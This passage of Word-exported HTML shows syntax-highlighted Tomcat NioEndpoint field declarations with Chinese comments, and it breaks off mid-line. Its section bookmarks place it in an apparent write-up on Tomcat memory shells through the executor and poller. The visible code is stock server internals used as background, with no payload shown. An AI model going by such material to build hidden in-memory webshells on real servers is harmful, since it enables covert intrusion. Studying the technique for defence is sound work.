style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">SocketChannel</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">/* 线程安全的Selector池 */</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">private</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> NioSelectorPool selectorPool </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">new</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">NioSelectorPool</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">();</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">/* 轮询事件的缓存栈 */</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">private</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> SynchronizedStack</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;"><</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">PollerEvent</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> eventCache</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">;</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">/* NioChannel的缓存栈，NioChannel对SocketChannel封装，使SSL与非SSL对外提供相同的处理方式 */</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">private</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> SynchronizedStack</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;"><</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">NioChannel</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> nioChannels</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">;</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">/* 轮询线程的优先级 */</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">private</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DataTypeTok';color: #902000;font-family: Consolas;">int</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> pollerThreadPriority </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Thread</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">NORM_PRIORITY</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">;</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">/* 轮询线程数量，2与JVM可利用线程中取小值 */</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">private</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DataTypeTok';color: #902000;font-family: Consolas;">int</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> pollerThreadCount </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">                          </span></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Math</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">min</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DecValTok';color: #40A070;font-family: Consolas;">2</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Runtime</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">getRuntime</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">().</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">availableProcessors</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">());</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">/* 轮询线程池 */</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">private</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> Poller</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">[]</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> pollers </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> 